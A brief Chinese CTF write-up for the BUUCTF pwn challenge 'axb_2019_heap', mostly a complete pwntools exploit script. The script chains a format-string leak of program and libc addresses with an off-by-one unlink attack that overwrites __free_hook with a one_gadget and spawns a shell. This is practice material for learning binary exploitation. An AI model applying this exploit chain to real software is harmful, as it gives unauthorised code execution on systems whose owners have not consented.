axb_2019_heap
查看保护
在get_input这个函数里有一个off-by-one
size大小>0x80
字符串格式化溢出
利用字符串格式化溢出,泄漏程序地址和libc,因为有一个off-by-one,这里采用unlink,因为程序会创建全局变量note来放入指针和size,unlink到这里改指针为hook,改hook为one_gadget即可。具体unlink手法见z1r0’s blog
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 27450)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = '>> '
def add(index, size, content):
r.sendlineafter(menu, '1')
r.sendlineafter('Enter the index you want to create (0-10):', str(index))
r.sendlineafter('Enter a size:', str(size))
r.sendlineafter('Enter the content: ', content)
def edit(index, content):
r.sendlineafter(menu, '4')
r.sendlineafter('Enter an index:', str(index))
r.sendlineafter('Enter the content: ', content)
def delete(index):
r.sendlineafter(menu, '2')
r.sendlineafter('Enter an index:', str(index))
offest = 7
p1 = '%11$p%15$p'
r.sendlineafter('Enter your name: ', p1)
r.recvuntil('0x')
base_addr = int(r.recv(12), 16) - 0x1186
success('base_addr = ' + hex(base_addr))
libc = ELF('./libc-2.23.so')
libc_base = int(r.recv(14), 16) - libc.sym['__libc_start_main'] - 240
success('libc_base = ' + hex(libc_base))
one = [0x45216, 0x4526a, 0xf03a4]
one_gadget = one[1] + libc_base
success('one_gadget = ' + hex(one_gadget))
free_hook = libc_base + libc.sym['__free_hook']
bss_addr = base_addr + 0x202060
add(0, 0x98, 'aaaa') #0
add(1, 0x90, 'bbbb') #1
add(2, 0x90, 'cccc') #2
fd = bss_addr - 0x18
bk = bss_addr - 0x10
p1 = p64(0) + p64(0x91) + p64(fd) + p64(bk) + p64(0) * 14 + p64(0x90) + b'\xa0'
edit(0, p1)
delete(1)
p2 = p64(0) * 3 + p64(free_hook) + p64(0x10)
edit(0, p2)
edit(0, p64(one_gadget))
delete(2)
r.interactive()